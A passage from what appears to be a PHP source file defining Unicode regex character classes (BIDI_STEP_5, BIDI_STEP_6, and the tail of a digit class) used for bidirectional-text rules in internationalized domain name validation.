'/[\\x{0030}-\\x{0039}\\x{00B2}-\\x{00B3}\\x{00B9}\\x{06F0}-\\x{06F9}\\x{2070}\\x{2074}-\\x{2079}\\x{2080}-\\x{2089}\\x{2488}-\\x{249B}\\x{FF10}-\\x{FF19}\\x{102E1}-\\x{102FB}\\x{1D7CE}-\\x{1D7FF}\\x{1F100}-\\x{1F10A}\\x{1FBF0}-\\x{1FBF9}]/u'; const BIDI_STEP_5 = '/[\\x{0009}\\x{000A}\\x{000B}\\x{000C}\\x{000D}\\x{001C}-\\x{001E}\\x{001F}\\x{0020}\\x{0085}\\x{0590}\\x{05BE}\\x{05C0}\\x{05C3}\\x{05C6}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0608}\\x{060B}\\x{060D}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{0660}-\\x{0669}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06DD}\\x{06E5}-\\x{06E6}\\x{06EE}-\\x{06EF}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0712}-\\x{072F}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07F4}-\\x{07F5}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{081A}\\x{0824}\\x{0828}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08E2}\\x{1680}\\x{2000}-\\x{200A}\\x{200F}\\x{2028}\\x{2029}\\x{202A}\\x{202B}\\x{202C}\\x{202D}\\x{202E}\\x{205F}\\x{2066}\\x{2067}\\x{2068}\\x{2069}\\x{3000}\\x{FB1D}\\x{FB1F}-\\x{FB28}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFE}-\\x{FDFF}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A04}\\x{10A07}-\\x{10A0B}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A3B}-\\x{10A3E}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}]/u'; const BIDI_STEP_6 = '/[^\\x{0000}-\\x{0008}\\x{0009}\\x{000A}\\x{000B}\\x{000C}\\x{000D}\\x{000E}-\\x{001B}\\x{001C}-\\x{001E}\\x{001F}\\x{0020}\\x{0021}-\\x{0022}\\x{0023}\\x{0024}\\x{0025}\\x{0026}-\\x{0027}\\x{0028}\\x{0029}\\x{002A}\\x{002B}\\x{002C}\\x{002D}\\x{002E}-\\x{002F}\\x{003A}\\x{003B}\\x{003C}-\\x{003E}\\x{003F}-\\x{0040}\\x{005B}\\x{005C}\\x{005D}\\x{005E}\\x{005F}\\x{0060}\\x{007B}\\x{007C}\\x{007D}\\x{007E}\\x{007F}-\\x{0084}\\x{0085}\\x{0086}-\\x{009F}\\x{00A0}\\x{00A1}\\x{00A2}-\\x{00A5}\\x{00A6}\\x{00A7}\\x{00A8}\\x{00A9}\\x{00AB}\\x{00AC}\\x{00AD}\\x{00AE}\\x{00AF}\\x{00B0}\\x{00B1}\\x{00B4}\\x{00B6}-\\x{00B7}\\x{00B8}\\x{00BB}\\x{00BC}-\\x{00BE}\\x{00BF}\\x{00D7}\\x{00F7}\\x{02B9}-\\x{02BA}\\x{02C2}-\\x{02C5}\\x{02C6}-\\x{02CF}\\x{02D2}-\\x{02DF}\\x{02E5}-\\x{02EB}\\x{02EC}\\x{02ED}\\x{02EF}-\\x{02FF}\\x{0300}-\\x{036F}\\x{0374}\\x{0375}\\x{037E}\\x{0384}-\\x{0385}\\x{0387}\\x{03F6}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{058A}\\x{058D}-\\x{058E}\\x{058F}\\x{0590}\\x{0591}-\\x{05BD}\\x{05BE}\\x{05BF}\\x{05C0}\\x{05C1}-\\x{05C2}\\x{05C3}\\x{05C4}-\\x{05C5}\\x{05C6}\\x{05C7}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0606}-\\x{0607}\\x{0608}\\x{0609}-\\x{060A}\\x{060B}\\x{060C}\\x{060D}\\x{060E}-\\x{060F}\\x{0610}-\\x{061A}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{064B}-\\x{065F}\\x{0660}-\\x{0669}\\x{066A}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0670}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06D6}-\\x{06DC}\\x{06DD}\\x{06DE}\\x{06DF}-\\x{06E4}\\x{06E5}-\\x{06E6}\\x{06E7}-\\x{06E8}\\x{06E9}\\x{06EA}-\\x{06ED}\\x{06EE}-\\x{06EF}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0711}\\x{0712}-\\x{072F}\\x{0730}-\\x{074A}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07A6}-\\x{07B0}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07EB}-\\x{07F3}\\x{07F4}-\\x{07F5}\\x{07F6}\\x{07F7}-\\x{07F9}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FD}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{0816}-\\x{0819}\\x{081A}\\x{081B}-\\x{0823}\\x{0824}\\x{0825}-\\x{0827}\\x{0828}\\x{0829}-\\x{082D}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{0859}-\\x{085B}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08D3}-\\x{08E1}\\x{08E2}\\x{08E3}-\\x{0902}\\x{093A}\\x{093C}\\x{0941}-\\x{0948}\\x{094D}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{09BC}\\x{09C1}-\\x{09C4}\\x{09CD}\\x{09E2}-\\x{09E3}\\x{09F2}-\\x{09F3}\\x{09FB}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A3C}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0ABC}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AF1}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B3C}\\x{0B3F}\\x{0B41}-\\x{0B44}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BC0}\\x{0BCD}\\x{0BF3}-\\x{0BF8}\\x{0BF9}\\x{0BFA}\\x{0C00}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C78}-\\x{0C7E}\\x{0C81}\\x{0CBC}\\x{0CCC}-\\x{0CCD}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D3B}-\\x{0D3C}\\x{0D41}-\\x{0D44}\\x{0D4D}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0DCA}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E3F}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F3A}\\x{0F3B}\\x{0F3C}\\x{0F3D}\\x{0F71}-\\x{0F7E}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102D}-\\x{1030}\\x{1032}-\\x{1037}\\x{1039}-\\x{103A}\\x{103D}-\\x{103E}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1071}-\\x{1074}\\x{1082}\\x{1085}-\\x{1086}\\x{108D}\\x{109D}\\x{135D}-\\x{135F}\\x{1390}-\\x{1399}\\x{1400}\\x{1680}\\x{169B}\\x{169C}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B7}-\\x{17BD}\\x{17C6}\\x{17C9}-\\x{17D3}\\x{17DB}\\x{17DD}\\x{17F0}-\\x{17F9}\\x{1800}-\\x{1805}\\x{1806}\\x{1807}-\\x{180A}\\x{180B}-\\x{180D}\\x{180E}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1927}-\\x{1928}\\x{1932}\\x{1939}-\\x{193B}\\x{1940}\\x{1944}-\\x{1945}\\x{19DE}-\\x{19FF}\\x{1A17}-\\x{1A18}\\x{1A1B}\\x{1A56}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A62}\\x{1A65}-\\x{1A6C}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B34}\\x{1B36}-\\x{1B3A}\\x{1B3C}\\x{1B42}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1BA2}-\\x{1BA5}\\x{1BA8}-\\x{1BA9}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE8}-\\x{1BE9}\\x{1BED}\\x{1BEF}-\\x{1BF1}\\x{1C2C}-\\x{1C33}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{1FBD}\\x{1FBF}-\\x{1FC1}\\x{1FCD}-\\x{1FCF}\\x{1FDD}-\\x{1FDF}\\x{1FED}-\\x{1FEF}\\x{1FFD}-\\x{1FFE}\\x{2000}-\\x{200A}\\x{200B}-\\x{200D}\\x{200F}\\x{2010}-\\x{2015}\\x{2016}-\\x{2017}\\x{2018}\\x{2019}\\x{201A}\\x{201B}-\\x{201C}\\x{201D}\\x{201E}\\x{201F}\\x{2020}-\\x{2027}\\x{2028}\\x{2029}\\x{202A}\\x{202B}\\x{202C}\\x{202D}\\x{202E}\\x{202F}\\x{2030}-\\x{2034}\\x{2035}-\\x{2038}\\x{2039}\\x{203A}\\x{203B}-\\x{203E}\\x{203F}-\\x{2040}\\x{2041}-\\x{2043}\\x{2044}\\x{2045}\\x{2046}\\x{2047}-\\x{2051}\\x{2052}\\x{2053}\\x{2054}\\x{2055}-\\x{205E}\\x{205F}\\x{2060}-\\x{2064}\\x{2065}\\x{2066}\\x{2067}\\x{2068}\\x{2069}\\x{206A}-\\x{206F}\\x{207A}-\\x{207B}\\x{207C}\\x{207D}\\x{207E}\\x{208A}-\\x{208B}\\x{208C}\\x{208D}\\x{208E}\\x{20A0}-\\x{20BF}\\x{20C0}-\\x{20CF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2100}-\\x{2101}\\x{2103}-\\x{2106}\\x{2108}-\\x{2109}\\x{2114}\\x{2116}-\\x{2117}\\x{2118}\\x{211E}-\\x{2123}\\x{2125}\\x{2127}\\x{2129}\\x{212E}\\x{213A}-\\x{213B}\\x{2140}-\\x{2144}\\x{214A}\\x{214B}\\x{214C}-\\x{214D}\\x{2150}-\\x{215F}\\x{2189}\\x{218A}-\\x{218B}\\x{2190}-\\x{2194}\\x{2195}-\\x{2199}\\x{219A}-\\x{219B}\\x{219C}-\\x{219F}\\x{21A0}\\x{21A1}-\\x{21A2}\\x{21A3}\\x{21A4}-\\x{21A5}\\x{21A6}\\x{21A7}-\\x{21AD}\\x{21AE}\\x{21AF}-\\x{21CD}\\x{21CE}-\\x{21CF}\\x{21D0}-\\x{21D1}\\x{21D2}\\x{21D3}\\x{21D4}\\x{21D5}-\\x{21F3}\\x{21F4}-\\x{2211}\\x{2212}\\x{2213}\\x{2214}-\\x{22FF}\\x{2300}-\\x{2307}\\x{2308}\\x{2309}\\x{230A}\\x{230B}\\x{230C}-\\x{231F}\\x{2320}-\\x{2321}\\x{2322}-\\x{2328}\\x{2329}\\x{232A}\\x{232B}-\\x{2335}\\x{237B}\\x{237C}\\x{237D}-\\x{2394}\\x{2396}-\\x{239A}\\x{239B}-\\x{23B3}\\x{23B4}-\\x{23DB}\\x{23DC}-\\x{23E1}\\x{23E2}-\\x{2426}\\x{2440}-\\x{244A}\\x{2460}-\\x{2487}\\x{24EA}-\\x{24FF}\\x{2500}-\\x{25B6}\\x{25B7}\\x{25B8}-\\x{25C0}\\x{25C1}\\x{25C2}-\\x{25F7}\\x{25F8}-\\x{25FF}\\x{2600}-\\x{266E}\\x{266F}\\x{2670}-\\x{26AB}\\x{26AD}-\\x{2767}\\x{2768}\\x{2769}\\x{276A}\\x{276B}\\x{276C}\\x{276D}\\x{276E}\\x{276F}\\x{2770}\\x{2771}\\x{2772}\\x{2773}\\x{2774}\\x{2775}\\x{2776}-\\x{2793}\\x{2794}-\\x{27BF}\\x{27C0}-\\x{27C4}\\x{27C5}\\x{27C6}\\x{27C7}-\\x{27E5}\\x{27E6}\\x{27E7}\\x{27E8}\\x{27E9}\\x{27EA}\\x{27EB}\\x{27EC}\\x{27ED}\\x{27EE}\\x{27EF}\\x{27F0}-\\x{27FF}\\x{2900}-\\x{2982}\\x{2983}\\x{2984}\\x{2985}\\x{2986}\\x{2987}\\x{2988}\\x{2989}\\x{298A}\\x{298B}\\x{298C}\\x{298D}\\x{298E}\\x{298F}\\x{2990}\\x{2991}\\x{2992}\\x{2993}\\x{2994}\\x{2995}\\x{2996}\\x{2997}\\x{2998}\\x{2999}-\\x{29D7}\\x{29D8}\\x{29D9}\\x{29DA}\\x{29DB}\\x{29DC}-\\x{29FB}\\x{29FC}\\x{29FD}\\x{29FE}-\\x{2AFF}\\x{2B00}-\\x{2B2F}\\x{2B30}-\\x{2B44}\\x{2B45}-\\x{2B46}\\x{2B47}-\\x{2B4C}\\x{2B4D}-\\x{2B73}\\x{2B76}-\\x{2B95}\\x{2B97}-\\x{2BFF}\\x{2CE5}-\\x{2CEA}\\x{2CEF}-\\x{2CF1}\\x{2CF9}-\\x{2CFC}\\x{2CFD}\\x{2CFE}-\\x{2CFF}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{2E00}-\\x{2E01}\\x{2E02}\\x{2E03}\\x{2E04}\\x{2E05}\\x{2E06}-\\x{2E08}\\x{2E09}\\x{2E0A}\\x{2E0B}\\x{2E0C}\\x{2E0D}\\x{2E0E}-\\x{2E16}\\x{2E17}\\x{2E18}-\\x{2E19}\\x{2E1A}\\x{2E1B}\\x{2E1C}\\x{2E1D}\\x{2E1E}-\\x{2E1F}\\x{2E20}\\x{2E21}\\x{2E22}\\x{2E23}\\x{2E24}\\x{2E25}\\x{2E26}\\x{2E27}\\x{2E28}\\x{2E29}\\x{2E2A}-\\x{2E2E}\\x{2E2F}\\x{2E30}-\\x{2E39}\\x{2E3A}-\\x{2E3B}\\x{2E3C}-\\x{2E3F}\\x{2E40}\\x{2E41}\\x{2E42}\\x{2E43}-\\x{2E4F}\\x{2E50}-\\x{2E51}\\x{2E52}\\x{2E80}-\\x{2E99}\\x{2E9B}-\\x{2EF3}\\x{2F00}-\\x{2FD5}\\x{2FF0}-\\x{2FFB}\\x{3000}\\x{3001}-\\x{3003}\\x{3004}\\x{3008}\\x{3009}\\x{300A}\\x{300B}\\x{300C}\\x{300D}\\x{300E}\\x{300F}\\x{3010}\\x{3011}\\x{3012}-\\x{3013}\\x{3014}\\x{3015}\\x{3016}\\x{3017}\\x{3018}\\x{3019}\\x{301A}\\x{301B}\\x{301C}\\x{301D}\\x{301E}-\\x{301F}\\x{3020}\\x{302A}-\\x{302D}\\x{3030}\\x{3036}-\\x{3037}\\x{303D}\\x{303E}-\\x{303F}\\x{3099}-\\x{309A}\\x{309B}-\\x{309C}\\x{30A0}\\x{30FB}\\x{31C0}-\\x{31E3}\\x{321D}-\\x{321E}\\x{3250}\\x{3251}-\\x{325F}\\x{327C}-\\x{327E}\\x{32B1}-\\x{32BF}\\x{32CC}-\\x{32CF}\\x{3377}-\\x{337A}\\x{33DE}-\\x{33DF}\\x{33FF}\\x{4DC0}-\\x{4DFF}\\x{A490}-\\x{A4C6}\\x{A60D}-\\x{A60F}\\x{A66F}\\x{A670}-\\x{A672}\\x{A673}\\x{A674}-\\x{A67D}\\x{A67E}\\x{A67F}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A700}-\\x{A716}\\x{A717}-\\x{A71F}\\x{A720}-\\x{A721}\\x{A788}\\x{A802}\\x{A806}\\x{A80B}\\x{A825}-\\x{A826}\\x{A828}-\\x{A82B}\\x{A82C}\\x{A838}\\x{A839}\\x{A874}-\\x{A877}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A980}-\\x{A982}\\x{A9B3}\\x{A9B6}-\\x{A9B9}\\x{A9BC}-\\x{A9BD}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA31}-\\x{AA32}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA7C}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEC}-\\x{AAED}\\x{AAF6}\\x{AB6A}-\\x{AB6B}\\x{ABE5}\\x{ABE8}\\x{ABED}\\x{FB1D}\\x{FB1E}\\x{FB1F}-\\x{FB28}\\x{FB29}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD3E}\\x{FD3F}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDD0}-\\x{FDEF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFD}\\x{FDFE}-\\x{FDFF}\\x{FE00}-\\x{FE0F}\\x{FE10}-\\x{FE16}\\x{FE17}\\x{FE18}\\x{FE19}\\x{FE20}-\\x{FE2F}\\x{FE30}\\x{FE31}-\\x{FE32}\\x{FE33}-\\x{FE34}\\x{FE35}\\x{FE36}\\x{FE37}\\x{FE38}\\x{FE39}\\x{FE3A}\\x{FE3B}\\x{FE3C}\\x{FE3D}\\x{FE3E}\\x{FE3F}\\x{FE40}\\x{FE41}\\x{FE42}\\x{FE43}\\x{FE44}\\x{FE45}-\\x{FE46}\\x{FE47}\\x{FE48}\\x{FE49}-\\x{FE4C}\\x{FE4D}-\\x{FE4F}\\x{FE50}\\x{FE51}\\x{FE52}\\x{FE54}\\x{FE55}\\x{FE56}-\\x{FE57}\\x{FE58}\\x{FE59}\\x{FE5A}\\x{FE5B}\\x{FE5C}\\x{FE5D}\\x{FE5E}\\x{FE5F}\\x{FE60}-\\x{FE61}\\x{FE62}\\x{FE63}\\x{FE64}-\\x{FE66}\\x{FE68}\\x{FE69}\\x{FE6A}\\x{FE6B}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{FEFF}\\x{FF01}-\\x{FF02}\\x{FF03}\\x{FF04}\\x{FF05}\\x{FF06}-\\x{FF07}\\x{FF08}\\x{FF09}\\x{FF0A}\\x{FF0B}\\x{FF0C}\\x{FF0D}\\x{FF0E}-\\x{FF0F}\\x{FF1A}\\x{FF1B}\\x{FF1C}-\\x{FF1E}\\x{FF1F}-\\x{FF20}\\x{FF3B}\\x{FF3C}\\x{FF3D}\\x{FF3E}\\x{FF3F}\\x{FF40}\\x{FF5B}\\x{FF5C}\\x{FF5D}\\x{FF5E}\\x{FF5F}\\x{FF60}\\x{FF61}\\x{FF62}\\x{FF63}\\x{FF64}-\\x{FF65}\\x{FFE0}-\\x{FFE1}\\x{FFE2}\\x{FFE3}\\x{FFE4}\\x{FFE5}-\\x{FFE6}\\x{FFE8}\\x{FFE9}-\\x{FFEC}\\x{FFED}-\\x{FFEE}\\x{FFF0}-\\x{FFF8}\\x{FFF9}-\\x{FFFB}\\x{FFFC}-\\x{FFFD}\\x{FFFE}-\\x{FFFF}\\x{10101}\\x{10140}-\\x{10174}\\x{10175}-\\x{10178}\\x{10179}-\\x{10189}\\x{1018A}-\\x{1018B}\\x{1018C}\\x{10190}-\\x{1019C}\\x{101A0}\\x{101FD}\\x{102E0}\\x{10376}-\\x{1037A}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\